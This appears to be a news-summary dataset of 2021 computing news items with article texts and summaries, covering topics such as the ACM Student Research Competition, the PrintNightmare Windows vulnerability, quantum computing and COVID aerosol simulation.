ACM has announced the winners of the 2021 Grand Finals of its Student Research Competition (SRC), which involved 296 computer science students presenting projects at 21 ACM conferences. The University of Texas at Austin's Jiaqi Gu took first place in the graduate category for developing a method of tapping optical neural networks to facilitate efficient neuromorphic computing. Thomas B. McHugh of Northwestern University was ranked first in the undergraduate category for his project, "Constructing Agency and Usability Through Community-Driven Assistive Technology Design." Microsoft Research's Evelyne Viegas said, "The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers." New York, NY, July 8, 2021 - The winners of the 2021 Grand Finals of the Association for Computing Machinery (ACM) Student Research Competition (SRC) were recently announced, culminating a year-long competition in which 296 computer science students presented research projects at 21 ACM conferences. Jiaqi Gu, University of Texas at Austin; Konstantinos Kallas, University of Pennsylvania; and Guyue Huang, Tsinghua University took the top three places among graduate students. Thomas B. McHugh, Northwestern University; Chuangtao Chen, Zhejiang University; and Rakshit Mittal, Birla Institute of Technology & Science took the top three spots among undergraduates. Microsoft sponsors the SRC by providing travel grants of $500 to allow exemplary computing students to attend and present their research at major ACM computing conferences around the world. Through the Student Research Competition, each participating student has the unique opportunity to attend conference sessions, gain a new understanding of the practical applications of computer science scholarship, and share their own research with other students, conference attendees and eminent scientists and practitioners. For most students, the ACM Student Research Competition is their introduction to participating in premier computing research conferences. "Despite the impact of the COVID pandemic, the ACM Student Research Competition celebrated another successful year," said ACM President Gabriele Kotsis. "The SRC opens up the world of professional computing research to students. As the organizers of the competition, we are always heartened to read the testimonials students write after the competition ends. A common thread that runs through all the testimonials is that participation in the competition is a memory that will stay with them. We also offer SRC participants Student Membership to ACM, which gives these young people access to a range of essential resources for learning and career development and keeps them connected with the broader computing community. We thank our friends at Microsoft for their ongoing support of the SRC." "We congratulate the Graduate and Undergraduate winners, as well as all who participated in this year's SRC," said Evelyne Viegas, Senior Director of Global Research Engagement at Microsoft Research. "Computing has become interwoven into almost every aspect of life and business. New innovations, brought about by computing research, will play an important role in addressing the challenges we will face in the coming years. The ACM Student Research Competition prepares students for the future contributions they will make. As active participants in the global research community, SRC students are given access to the world's top computing conferences that empower them to engage in dialogue and share their ideas before experts and peers." Judges assess each presenter's demonstrated knowledge, the caliber of student contributions to the research and the overall quality of their oral and visual presentations. The most successful student researchers move through the competition's stages. In the first stages, their research posters and presentations are evaluated for content and presentation. During the Grand Finals, the students share a written 4,000-word description of their work before the final step of the competition, when an entirely new panel of judges evaluates each student's complete body of work and selects the overall winners. The 2021 Student Winners: Graduate Category Undergraduate Category The ACM Student Research Competition (SRC) , sponsored by Microsoft, offers a unique forum for undergraduate and graduate students to present their original research at well-known ACM sponsored and co-sponsored conferences before a panel of judges and attendees. The SRC is s a joint venture of ACM and Microsoft, which has provided generous funding of $120,000 per competition year for this event since 2003. The top three undergraduate and graduate winners at each SRC receive prizes of $500, $300, and $200, respectively (USD), an award medal and a one-year complimentary ACM student membership with a subscription to ACM's Digital Library. ACM, the Association for Computing Machinery , is the world's largest educational and scientific computing society, uniting educators, researchers and professionals to inspire dialogue, share resources and address the field's challenges. ACM strengthens the computing profession's collective voice through strong leadership, promotion of the highest standards, and recognition of technical excellence. ACM supports the professional growth of its members by providing opportunities for life-long learning, career development, and professional networking.
152
Microsoft's Emergency Patch Fails to Fix Critical 'PrintNightmare' Vulnerability
An emergency patch Microsoft issued on Tuesday fails to fully fix a critical security vulnerability in all supported versions of Windows that allows attackers to take control of infected systems and run code of their choice, researchers said. The threat, colloquially known as PrintNightmare, stems from bugs in the Windows print spooler, which provides printing functionality inside local networks. Proof-of-concept exploit code was publicly released and then pulled back, but not before others had copied it. Researchers track the vulnerability as CVE-2021-34527. Attackers can exploit it remotely when print capabilities are exposed to the Internet. Attackers can also use it to escalate system privileges once they've used a different vulnerability to gain a toe-hold inside of a vulnerable network. In either case, the adversaries can then gain control of the domain controller, which as the server that authenticates local users, is one of the most security-sensitive assets on any Windows network. "It's the biggest deal I've dealt with in a very long time," said Will Dormann, a senior vulnerability analyst at the CERT Coordination Center, a nonprofit, United States federally funded project that researches software bugs and works with business and government to improve security. "Any time there's public exploit code for an unpatched vulnerability that can compromise a Windows domain controller, that's bad news." After the severity of the bug came to light, Microsoft published an out-of-band fix on Tuesday. Microsoft said the update "fully addresses the public vulnerability." But on Wednesday - a little more than 12 hours after the release - a researcher showed how exploits could bypass the patch. "Dealing with strings & filenames is hard," Benjamin Delpy, a developer of the hacking and network utility Mimikatz and other software, wrote on Twitter . Accompanying Delpy's tweet was a video that showed a hastily written exploit working against a Windows Server 2019 that had installed the out-of-band patch. The demo shows that the update fails to fix vulnerable systems that use certain settings for a feature called point and print , which makes it easier for network users to obtain the printer drivers they need. Buried near the bottom of Microsoft's advisory from Tuesday is the following: "Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible." The incomplete patch is the latest gaffe involving the PrintNightmare vulnerability. Last month, Microsoft's monthly patch batch fixed CVE-2021-1675 , a print spooler bug that allowed hackers with limited system rights on a machine to escalate privilege to administrator. Microsoft credited Zhipeng Huo of Tencent Security, Piotr Madej of Afine, and Yunhai Zhang of Nsfocus with discovering and reporting the flaw. A few weeks later, two different researchers - Zhiniang Peng and Xuefeng Li from Sangfor - published an analysis of CVE-2021-1675 that showed it could be exploited not just for privilege escalation but also for achieving remote code execution. The researchers named their exploit PrintNightmare. Eventually, researchers determined that PrintNightmare exploited a vulnerability that was similar (but ultimately different from) CVE-2021-1675. Zhiniang Peng and Xuefeng Li removed their proof-of-concept exploit when they learned of the confusion, but by then, their exploit was already widely circulating. There are currently at least three PoC exploits publicly available, some with capabilities that go well beyond what the initial exploit allowed. Microsoft's fix protects Windows servers that are set up as domain controllers or Windows 10 devices that use default settings. Wednesday's demo from Delpy shows that PrintNightmare works against a much wider range of systems, including those that have enabled a Point and Print and selected the NoWarningNoElevationOnInstall option. The researcher implemented the exploit in Mimikatz. Besides trying to close the code-execution vulnerability, Tuesday's fix for CVE-2021-34527 also installs a new mechanism that allows Windows administrators to implement stronger restrictions when users try to install printer software. "Prior to installing the July 6, 2021, and newer Windows Updates containing protections for CVE-2021-34527, the printer operators' security group could install both signed and unsigned printer drivers on a printer server," a Microsoft advisory stated. "After installing such updates, delegated admin groups like printer operators can only install signed printer drivers. Administrator credentials will be required to install unsigned printer drivers on a printer server going forward." Despite Tuesday's out-of-band patch being incomplete, it still provides meaningful protection against many types of attacks that exploit the print spooler vulnerability. So far, there are no known cases of researchers saying it puts systems at risk. Unless that changes, Windows users should install both the patch from June and Tuesday and await further instructions from Microsoft. Company representatives didn't immediately have a comment for this post.
Researchers warn a software patch Microsoft issued this week did not fully correct a flaw in all supported versions of the Windows operating system that allows hackers to commandeer infected networks. The PrintNightmare vulnerability is rooted in bugs in the Windows print spooler, which supports printing functionality in local networks, and which attackers can exploit remotely when print capabilities are exposed online. Hackers also can use the flaw to escalate system privileges once they have infiltrated a vulnerable network via another bug, hijacking the domain controller. Benjamin Delpy, a developer of the hacking and network utility Mimikatz, tweeted that exploits could circumvent Microsoft's out-of-band update, which fails to fix vulnerable systems that employ certain settings for the point and print feature.
[]
[]
[]
scitechnews
None
None
None
None
Researchers warn a software patch Microsoft issued this week did not fully correct a flaw in all supported versions of the Windows operating system that allows hackers to commandeer infected networks. The PrintNightmare vulnerability is rooted in bugs in the Windows print spooler, which supports printing functionality in local networks, and which attackers can exploit remotely when print capabilities are exposed online. Hackers also can use the flaw to escalate system privileges once they have infiltrated a vulnerable network via another bug, hijacking the domain controller. Benjamin Delpy, a developer of the hacking and network utility Mimikatz, tweeted that exploits could circumvent Microsoft's out-of-band update, which fails to fix vulnerable systems that employ certain settings for the point and print feature. An emergency patch Microsoft issued on Tuesday fails to fully fix a critical security vulnerability in all supported versions of Windows that allows attackers to take control of infected systems and run code of their choice, researchers said. The threat, colloquially known as PrintNightmare, stems from bugs in the Windows print spooler, which provides printing functionality inside local networks. Proof-of-concept exploit code was publicly released and then pulled back, but not before others had copied it. Researchers track the vulnerability as CVE-2021-34527. Attackers can exploit it remotely when print capabilities are exposed to the Internet. Attackers can also use it to escalate system privileges once they've used a different vulnerability to gain a toe-hold inside of a vulnerable network. In either case, the adversaries can then gain control of the domain controller, which as the server that authenticates local users, is one of the most security-sensitive assets on any Windows network. "It's the biggest deal I've dealt with in a very long time," said Will Dormann, a senior vulnerability analyst at the CERT Coordination Center, a nonprofit, United States federally funded project that researches software bugs and works with business and government to improve security. "Any time there's public exploit code for an unpatched vulnerability that can compromise a Windows domain controller, that's bad news." After the severity of the bug came to light, Microsoft published an out-of-band fix on Tuesday. Microsoft said the update "fully addresses the public vulnerability." But on Wednesday - a little more than 12 hours after the release - a researcher showed how exploits could bypass the patch. "Dealing with strings & filenames is hard," Benjamin Delpy, a developer of the hacking and network utility Mimikatz and other software, wrote on Twitter . Accompanying Delpy's tweet was a video that showed a hastily written exploit working against a Windows Server 2019 that had installed the out-of-band patch. The demo shows that the update fails to fix vulnerable systems that use certain settings for a feature called point and print , which makes it easier for network users to obtain the printer drivers they need. Buried near the bottom of Microsoft's advisory from Tuesday is the following: "Point and Print is not directly related to this vulnerability, but the technology weakens the local security posture in such a way that exploitation will be possible." The incomplete patch is the latest gaffe involving the PrintNightmare vulnerability. Last month, Microsoft's monthly patch batch fixed CVE-2021-1675 , a print spooler bug that allowed hackers with limited system rights on a machine to escalate privilege to administrator. Microsoft credited Zhipeng Huo of Tencent Security, Piotr Madej of Afine, and Yunhai Zhang of Nsfocus with discovering and reporting the flaw. A few weeks later, two different researchers - Zhiniang Peng and Xuefeng Li from Sangfor - published an analysis of CVE-2021-1675 that showed it could be exploited not just for privilege escalation but also for achieving remote code execution. The researchers named their exploit PrintNightmare. Eventually, researchers determined that PrintNightmare exploited a vulnerability that was similar (but ultimately different from) CVE-2021-1675. Zhiniang Peng and Xuefeng Li removed their proof-of-concept exploit when they learned of the confusion, but by then, their exploit was already widely circulating. There are currently at least three PoC exploits publicly available, some with capabilities that go well beyond what the initial exploit allowed. Microsoft's fix protects Windows servers that are set up as domain controllers or Windows 10 devices that use default settings. Wednesday's demo from Delpy shows that PrintNightmare works against a much wider range of systems, including those that have enabled a Point and Print and selected the NoWarningNoElevationOnInstall option. The researcher implemented the exploit in Mimikatz. Besides trying to close the code-execution vulnerability, Tuesday's fix for CVE-2021-34527 also installs a new mechanism that allows Windows administrators to implement stronger restrictions when users try to install printer software. "Prior to installing the July 6, 2021, and newer Windows Updates containing protections for CVE-2021-34527, the printer operators' security group could install both signed and unsigned printer drivers on a printer server," a Microsoft advisory stated. "After installing such updates, delegated admin groups like printer operators can only install signed printer drivers. Administrator credentials will be required to install unsigned printer drivers on a printer server going forward." Despite Tuesday's out-of-band patch being incomplete, it still provides meaningful protection against many types of attacks that exploit the print spooler vulnerability. So far, there are no known cases of researchers saying it puts systems at risk. Unless that changes, Windows users should install both the patch from June and Tuesday and await further instructions from Microsoft. Company representatives didn't immediately have a comment for this post.
153
Facebook, Twitter, Google Threaten to Quit Hong Kong Over Proposed Data Laws
Facebook, Twitter, and Google have privately threatened to halt service to Hong Kong if the city's government revises data-protection ordinances that could make the companies liable for doxing, or malicious online sharing of individuals' information. The Singapore-based Asia Internet Coalition, which the Internet firms are members of, expressed concern the proposed rules' vague language could subject their employees to criminal investigations or prosecution for doxing by their users. "The only way to avoid these sanctions for technology companies would be to refrain from investing and offering the services in Hong Kong," states a letter from the Coalition. The letter further said the proposed revisions could curtail free expression and outlaw even "innocent acts of sharing information online."
[]
[]
[]
scitechnews
None
None
None
None
Facebook, Twitter, and Google have privately threatened to halt service to Hong Kong if the city's government revises data-protection ordinances that could make the companies liable for doxing, or malicious online sharing of individuals' information. The Singapore-based Asia Internet Coalition, which the Internet firms are members of, expressed concern the proposed rules' vague language could subject their employees to criminal investigations or prosecution for doxing by their users. "The only way to avoid these sanctions for technology companies would be to refrain from investing and offering the services in Hong Kong," states a letter from the Coalition. The letter further said the proposed revisions could curtail free expression and outlaw even "innocent acts of sharing information online."
154
Untappable Communication Becomes Practical with MDI-QKD System in Future Quantum Internet
Slater: "A major advantage of our system over other QKD systems is its scaling to many users. Our MDI-QKD can be used in a star-type physical network. Researchers at QuTech have already previously performed the first proof-of-principle demonstration of MDI-QKD, the first demonstration over deployed fibres, and the first demonstration using cost-effective, off-the-shelf hardware."
Engineers at the QuTech institute created by the Delft University of Technology (TU Delft) and the Netherlands Organization for Applied Scientific Research have devised a cost-scalable system for untappable communication. TU Delft's Joshua Slater said the measurement-device independent quantum key distribution (MDI-QKD) system enables the connection of multiple users through a central node that functions like a switchboard operator. Said Slater, "The entire system is designed such that hacking attacks against the central node cannot break the security of the protocol." He also said QuTech researchers have facilitated a proof-of-principle demonstration of MDI-QKD, as well as demonstrations of its capabilities over deployed optical fibers and commercially available hardware.
[]
[]
[]
scitechnews
None
None
None
None
Engineers at the QuTech institute created by the Delft University of Technology (TU Delft) and the Netherlands Organization for Applied Scientific Research have devised a cost-scalable system for untappable communication. TU Delft's Joshua Slater said the measurement-device independent quantum key distribution (MDI-QKD) system enables the connection of multiple users through a central node that functions like a switchboard operator. Said Slater, "The entire system is designed such that hacking attacks against the central node cannot break the security of the protocol." He also said QuTech researchers have facilitated a proof-of-principle demonstration of MDI-QKD, as well as demonstrations of its capabilities over deployed optical fibers and commercially available hardware. Slater: "A major advantage of our system over other QKD systems is its scaling to many users. Our MDI-QKD can be used in a star-type physical network. Researchers at QuTech have already previously performed the first proof-of-principle demonstration of MDI-QKD, the first demonstration over deployed fibres, and the first demonstration using cost-effective, off-the-shelf hardware."
155
Giant 3D Cat Takes Over One of Tokyo's Biggest Billboards
One of the largest billboards in Tokyo is displaying a hyper-realistic three-dimensional (3D) cat in 4K resolution. The gigantic feline is projected moving around on a 1,664-sq.-ft. (155-square-meter) curved light-emitting diode (LED) screen overlooking a railway station in the city's Shinjuku district. The Shinjuku cat, airing between 7 a.m. and 1 a.m., is a test broadcast for a display that officially opens July 12. The Cross Shinjuku Vision billboard's owners said the 3D effect of the display can diminish depending on the viewing angle. One of the companies that organized the display, Cross Space, has begun livestreaming a view of the billboard on online video service YouTube.
[]
[]
[]
scitechnews
None
None
None
None
One of the largest billboards in Tokyo is displaying a hyper-realistic three-dimensional (3D) cat in 4K resolution. The gigantic feline is projected moving around on a 1,664-sq.-ft. (155-square-meter) curved light-emitting diode (LED) screen overlooking a railway station in the city's Shinjuku district. The Shinjuku cat, airing between 7 a.m. and 1 a.m., is a test broadcast for a display that officially opens July 12. The Cross Shinjuku Vision billboard's owners said the 3D effect of the display can diminish depending on the viewing angle. One of the companies that organized the display, Cross Space, has begun livestreaming a view of the billboard on online video service YouTube.
156
Europe to Launch 2-Handed Robotic Arm to the International Space Station
Tereza is a London-based science and technology journalist, aspiring fiction writer and amateur gymnast. Originally from Prague, the Czech Republic, she spent the first seven years of her career working as a reporter, script-writer and presenter for various TV programmes of the Czech Public Service Television. She later took a career break to pursue further education and added a Master's in Science from the International Space University, France, to her Bachelor's in Journalism and Master's in Cultural Anthropology from Prague's Charles University. She worked as a reporter at the Engineering and Technology magazine, freelanced for a range of publications including Live Science, Space.com, Professional Engineering, Via Satellite and Space News and served as a maternity cover science editor at the European Space Agency.
The European Robotic Arm, developed by Airbus for the European Space Agency, is scheduled to be flown to the International Space Station on July 15 with the new Russian Multipurpose Laboratory Module. The autonomous robotic arm features dexterous hands attached to two symmetrical arms, each just over 16 feet (just under 5 meters) long. Made of lightweight aluminum and carbon fiber, the arm can install components weighing up to 17,600 pounds, reach targets with 5-millimeter precision, and transport astronauts from one work site to another during spacewalks. It also is equipped with an infrared camera that can be used to inspect the exterior of the space station and stream video to the astronauts inside. The arm can be controlled by the astronauts in real time, or autonomously perform pre-programmed tasks.
[]
[]
[]
scitechnews
None
None
None
None
The European Robotic Arm, developed by Airbus for the European Space Agency, is scheduled to be flown to the International Space Station on July 15 with the new Russian Multipurpose Laboratory Module. The autonomous robotic arm features dexterous hands attached to two symmetrical arms, each just over 16 feet (just under 5 meters) long. Made of lightweight aluminum and carbon fiber, the arm can install components weighing up to 17,600 pounds, reach targets with 5-millimeter precision, and transport astronauts from one work site to another during spacewalks. It also is equipped with an infrared camera that can be used to inspect the exterior of the space station and stream video to the astronauts inside. The arm can be controlled by the astronauts in real time, or autonomously perform pre-programmed tasks. Tereza is a London-based science and technology journalist, aspiring fiction writer and amateur gymnast. Originally from Prague, the Czech Republic, she spent the first seven years of her career working as a reporter, script-writer and presenter for various TV programmes of the Czech Public Service Television. She later took a career break to pursue further education and added a Master's in Science from the International Space University, France, to her Bachelor's in Journalism and Master's in Cultural Anthropology from Prague's Charles University. She worked as a reporter at the Engineering and Technology magazine, freelanced for a range of publications including Live Science, Space.com, Professional Engineering, Via Satellite and Space News and served as a maternity cover science editor at the European Space Agency.
157
The Tech Cold War's 'Most Complicated Machine' That's Out of China's Reach
Manufacturers can't produce leading-edge chips without the system, and "it is only made by the Dutch firm ASML," said Will Hunt, a research analyst at Georgetown University's Center for Security and Emerging Technology, which has concluded that it would take China at least a decade to build its own similar equipment. "From China's perspective, that is a frustrating thing."
A Dutch company's computer-chip manufacturing system has become a point of leverage in the U.S.-Chinese competition for global dominance in the computer industry. ASML Holding's $150-million-plus system defines ultrasmall circuitry on leading-edge chips with extreme ultraviolet light to boost performance. ASML's machine also requires development and assembly across three continents, making any country's ambitions to build a totally self-sufficient semiconductor supply chain unrealistic. The system uses mirrors made by Germany's Zeiss optics firm and other hardware by San Diego-based Cymer; Japanese companies provide critical chemicals and photomasks. The Biden administration appears likely to uphold the previous administration's embargo on selling ASML equipment to China.
[]
[]
[]
scitechnews
None
None
None
None
A Dutch company's computer-chip manufacturing system has become a point of leverage in the U.S.-Chinese competition for global dominance in the computer industry. ASML Holding's $150-million-plus system defines ultrasmall circuitry on leading-edge chips with extreme ultraviolet light to boost performance. ASML's machine also requires development and assembly across three continents, making any country's ambitions to build a totally self-sufficient semiconductor supply chain unrealistic. The system uses mirrors made by Germany's Zeiss optics firm and other hardware by San Diego-based Cymer; Japanese companies provide critical chemicals and photomasks. The Biden administration appears likely to uphold the previous administration's embargo on selling ASML equipment to China. Manufacturers can't produce leading-edge chips without the system, and "it is only made by the Dutch firm ASML," said Will Hunt, a research analyst at Georgetown University's Center for Security and Emerging Technology, which has concluded that it would take China at least a decade to build its own similar equipment. "From China's perspective, that is a frustrating thing."
158
Simulation of Air Flow After Coughing, Sneezing to Study the Transmission of Diseases Such as COVID-19
By the beginning of April 2021, the number of people infected during the COVID-19 pandemic had risen to more than 130 million people of whom more than 2.8 million died. The SARS-CoV-2 virus responsible for COVID-19 is transmitted particularly by droplets or aerosols emitted when an infected person speaks, sneezes or coughs. This is how the viruses and other pathogens spread through the environment and transmit infectious diseases when they are inhaled by someone else. The capacity of these particles to remain suspended in the air and to spread in the environment depends largely on the size and nature of the air flow generated by the expiration of air. As with other airborne infectious diseases such as tuberculosis, common flu or measles, the role played by fluid dynamics is key to predicting the risk of infection by inhaling these particles in suspension. In a coughing event that lasts for 0.4 seconds and has a maximum exhaled air speed of 4.8 m/s, the flow first generates a turbulent stream of air that is hotter and more humid than that of the environment. Once the expiration is over, the stream turns into a puff of air that rises because of flotation and its lack of weight while it dissipates. The particles transported by this flow form clouds, the trajectories of which depend on their size. The dynamics of the largest particles are governed by gravity and describe parabolas with a clear horizontal limit. Despite their limited ability to remain in suspension and the limited horizontal scope, the viral load can be high because they are large (diameters larger than 50 microns). In contrast, the smallest particles (with diameters shorter than 50 microns) are transported by the action of air flow. These aerosols are capable of remaining in suspension for longer times and they spread over a greater area. The largest particles remain in the air for a few seconds while the smallest can remain suspended for up to a few minutes, Even though their viral load is smaller, these aerosols can get through face masks and be moved from room to room, for example, through ventilation systems. The retention percentage of face masks decreases when the particles are smaller. The behaviour of the particle cloud depends on the size of the particles and can be complicated by the effects of evaporation, which gradually reduces the diameter of the droplets. The video shows the results of the numerical simulation of aerosol dispersion produced by a sneeze. Particles are expelled during the expiration of air and are mainly transported by the action of moving air and gravity. To evaluate the impact of the evaporation of the aqueous fraction that reduces the size of the particles, the transport of aerosols that had not evaporated (left-hand panel) was compared with those that had evaporated (right-hand panel). The colour shows the evaporated water fraction between 0 and 1 for no evaporation and total evaporation, respectively. With the support of the Consortium of University Services of Catalonia, the research group form the URV's Department of Mechanical Engineering, led by Alexandre Fabregat and Jordi Pallarés, in conjunction with researchers from the University of the State of Utah and the University of Illinois, has used high-performance numerical simulations to study in unprecedented detail the process of aerosol dispersion generated by a cough or a sneeze. The level of detail was so high that they needed considerable calculation power and numerous processors of a supercomputer working at the same time. The results indicate that the plume of air produced by the expiration carries particles of less than 32 microns above the height of emission, which generates a cloud that has a great capacity to remain in suspension and be dispersed by air currents over a significant distance. The largest particles have a limited scope which is not changed by the effect of evaporation during the displacement to the ground. Assuming the habitual viral loads for infectious diseases, the results were used to draw a map of the concentration of viral particles around the infected person after they had coughed or sneezed. This research has been published as two scientific articles in the journal Physics of Fluids with the titles "Direct numerical simulation of the turbulent flow generated during a violent expiratory event" and "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event." Both articles were featured on the front cover because of their scientific impact. References: Alexandre Fabregat , Ferran Gisbert , Anton Vernet , Som Dutta , Ketan Mittal , and Jordi Pallarès , "Direct numerical simulation of the turbulent flow generated during a violent expiratory event," Physics of Fluids 33, 035122 (2021) https://doi.org/10.1063/5.0042086 Alexandre Fabregat , Ferran Gisbert , Anton Vernet , Josep Anton Ferré , Ketan Mittal , Som Dutta , and Jordi Pallarès , "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event," Physics of Fluids 33, 033329 (2021) https://doi.org/10.1063/5.0045416
Researchers at Spain's Universitat Rovira i Virgili (URV) simulated air flow from coughing and sneezing using high-performance computation systems to better understand the airborne spread of diseases like COVID-19. The researchers found the air plume generated by a cough or sneeze carries particles smaller than 32 microns higher than the height of emission, producing a cloud that can remain suspended and dispersed by air currents over long distances. The researchers used the results of the simulations to develop a map of the concentration of viral particles around an infected person following a cough or sneeze.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at Spain's Universitat Rovira i Virgili (URV) simulated air flow from coughing and sneezing using high-performance computation systems to better understand the airborne spread of diseases like COVID-19. The researchers found the air plume generated by a cough or sneeze carries particles smaller than 32 microns higher than the height of emission, producing a cloud that can remain suspended and dispersed by air currents over long distances. The researchers used the results of the simulations to develop a map of the concentration of viral particles around an infected person following a cough or sneeze. By the beginning of April 2021, the number of people infected during the COVID-19 pandemic had risen to more than 130 million people of whom more than 2.8 million died. The SARS-CoV-2 virus responsible for COVID-19 is transmitted particularly by droplets or aerosols emitted when an infected person speaks, sneezes or coughs. This is how the viruses and other pathogens spread through the environment and transmit infectious diseases when they are inhaled by someone else. The capacity of these particles to remain suspended in the air and to spread in the environment depends largely on the size and nature of the air flow generated by the expiration of air. As with other airborne infectious diseases such as tuberculosis, common flu or measles, the role played by fluid dynamics is key to predicting the risk of infection by inhaling these particles in suspension. In a coughing event that lasts for 0.4 seconds and has a maximum exhaled air speed of 4.8 m/s, the flow first generates a turbulent stream of air that is hotter and more humid than that of the environment. Once the expiration is over, the stream turns into a puff of air that rises because of flotation and its lack of weight while it dissipates. The particles transported by this flow form clouds, the trajectories of which depend on their size. The dynamics of the largest particles are governed by gravity and describe parabolas with a clear horizontal limit. Despite their limited ability to remain in suspension and the limited horizontal scope, the viral load can be high because they are large (diameters larger than 50 microns). In contrast, the smallest particles (with diameters shorter than 50 microns) are transported by the action of air flow. These aerosols are capable of remaining in suspension for longer times and they spread over a greater area. The largest particles remain in the air for a few seconds while the smallest can remain suspended for up to a few minutes, Even though their viral load is smaller, these aerosols can get through face masks and be moved from room to room, for example, through ventilation systems. The retention percentage of face masks decreases when the particles are smaller. The behaviour of the particle cloud depends on the size of the particles and can be complicated by the effects of evaporation, which gradually reduces the diameter of the droplets. The video shows the results of the numerical simulation of aerosol dispersion produced by a sneeze. Particles are expelled during the expiration of air and are mainly transported by the action of moving air and gravity. To evaluate the impact of the evaporation of the aqueous fraction that reduces the size of the particles, the transport of aerosols that had not evaporated (left-hand panel) was compared with those that had evaporated (right-hand panel). The colour shows the evaporated water fraction between 0 and 1 for no evaporation and total evaporation, respectively. With the support of the Consortium of University Services of Catalonia, the research group form the URV's Department of Mechanical Engineering, led by Alexandre Fabregat and Jordi Pallarés, in conjunction with researchers from the University of the State of Utah and the University of Illinois, has used high-performance numerical simulations to study in unprecedented detail the process of aerosol dispersion generated by a cough or a sneeze. The level of detail was so high that they needed considerable calculation power and numerous processors of a supercomputer working at the same time. The results indicate that the plume of air produced by the expiration carries particles of less than 32 microns above the height of emission, which generates a cloud that has a great capacity to remain in suspension and be dispersed by air currents over a significant distance. The largest particles have a limited scope which is not changed by the effect of evaporation during the displacement to the ground. Assuming the habitual viral loads for infectious diseases, the results were used to draw a map of the concentration of viral particles around the infected person after they had coughed or sneezed. This research has been published as two scientific articles in the journal Physics of Fluids with the titles "Direct numerical simulation of the turbulent flow generated during a violent expiratory event" and "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event." Both articles were featured on the front cover because of their scientific impact. References: Alexandre Fabregat , Ferran Gisbert , Anton Vernet , Som Dutta , Ketan Mittal , and Jordi Pallarès , "Direct numerical simulation of the turbulent flow generated during a violent expiratory event," Physics of Fluids 33, 035122 (2021) https://doi.org/10.1063/5.0042086 Alexandre Fabregat , Ferran Gisbert , Anton Vernet , Josep Anton Ferré , Ketan Mittal , Som Dutta , and Jordi Pallarès , "Direct numerical simulation of turbulent dispersion of evaporative aerosol clouds produced by an intense expiratory event," Physics of Fluids 33, 033329 (2021) https://doi.org/10.1063/5.0045416
159
Data Security Rules Instituted for U.S. Payment Processing System
New data security rules governing the payment system that facilitates direct deposits and direct payments for nearly all U.S. bank and credit union accounts are now in effect. The National Automated Clearinghouse Association (NACHA) stipulates that an account number used for any Automated Clearinghouse (ACH) payment must be rendered indecipherable while stored electronically. This mandate is applicable to any facility where account numbers related to ACH entries are stored. NACHA has instructed ACH originators and third parties that process over 6 million ACH transactions annually to render deposit account data unreadable when stored electronically, recommending measures that include encryption, truncation, tokenization, and destruction. The regulator said access controls like passwords are unacceptable, but disk encryption is permitted, provided additional and prescribed physical safeguards are implemented.
[]
[]
[]
scitechnews
None
None
None
None
New data security rules governing the payment system that facilitates direct deposits and direct payments for nearly all U.S. bank and credit union accounts are now in effect. The National Automated Clearinghouse Association (NACHA) stipulates that an account number used for any Automated Clearinghouse (ACH) payment must be rendered indecipherable while stored electronically. This mandate is applicable to any facility where account numbers related to ACH entries are stored. NACHA has instructed ACH originators and third parties that process over 6 million ACH transactions annually to render deposit account data unreadable when stored electronically, recommending measures that include encryption, truncation, tokenization, and destruction. The regulator said access controls like passwords are unacceptable, but disk encryption is permitted, provided additional and prescribed physical safeguards are implemented.
160
China Beats Google to Claim the World's Most Powerful Quantum Computer
By Matthew Sparkes The Zuchongzhi quantum computer University of Science and Technology of China/quantumcomputer.ac.cn A team in China has demonstrated that it has the world's most powerful quantum computer, leapfrogging the previous record holder, Google. Jian-Wei Pan at the University of Science and Technology of China in Hefei and his colleagues say their quantum computer has solved a problem in just over an hour that would take the world's most powerful classical supercomputer eight years to crack, and may yet be capable of exponentially higher performance. The problem, which has become a benchmark in quantum computing , involves simulating a quantum ...
Chinese researchers have demonstrated the world's most powerful quantum computer, displacing Google's Sycamore processor as the holder of quantum supremacy. The 54-quantum-bit (qubit) Sycamore solved the benchmark problem of simulating a quantum circuit and sampling random numbers from its output in three minutes 20 seconds; the Google team said the most powerful classical supercomputer would have taken 10,000 years to crack the problem. The Chinese team's Zuchongzhi processor featured 66 qubits, although the team reportedly used just 56 to solve the same challenge in about 70 minutes. Peter Knight at the U.K.'s Imperial College London said, "What this has done is really demonstrate what we've always thought we knew, but didn't have proved experimentally, that you can always beat a classical machine by adding a few more qubits."
[]
[]
[]
scitechnews
None
None
None
None
Chinese researchers have demonstrated the world's most powerful quantum computer, displacing Google's Sycamore processor as the holder of quantum supremacy. The 54-quantum-bit (qubit) Sycamore solved the benchmark problem of simulating a quantum circuit and sampling random numbers from its output in three minutes 20 seconds; the Google team said the most powerful classical supercomputer would have taken 10,000 years to crack the problem. The Chinese team's Zuchongzhi processor featured 66 qubits, although the team reportedly used just 56 to solve the same challenge in about 70 minutes. Peter Knight at the U.K.'s Imperial College London said, "What this has done is really demonstrate what we've always thought we knew, but didn't have proved experimentally, that you can always beat a classical machine by adding a few more qubits." By Matthew Sparkes The Zuchongzhi quantum computer University of Science and Technology of China/quantumcomputer.ac.cn A team in China has demonstrated that it has the world's most powerful quantum computer, leapfrogging the previous record holder, Google. Jian-Wei Pan at the University of Science and Technology of China in Hefei and his colleagues say their quantum computer has solved a problem in just over an hour that would take the world's most powerful classical supercomputer eight years to crack, and may yet be capable of exponentially higher performance. The problem, which has become a benchmark in quantum computing , involves simulating a quantum ...
161
Technion Study Finds Warmth of AI Systems More Important Than Capability
A study by researchers at the Technion - Israel Institute of Technology found that potential users of artificial intelligence (AI) systems consider such systems' "warmth" more important than capability and competence. The study of more than 1,600 participants defined warmth as related to traits indicating the AI system's perceived intent, such as friendliness, helpfulness, sincerity, trustworthiness, and morality. The researchers found participants preferred "warm" AI systems built for the consumer that use algorithms trained on less data over systems built for the producer that use state-of-the-art artificial neural network algorithms. The researchers looked at navigation apps, search engines, and recommender systems, in contrast to prior research that focused on virtual agents or robots.
[]
[]
[]
scitechnews
None
None
None
None
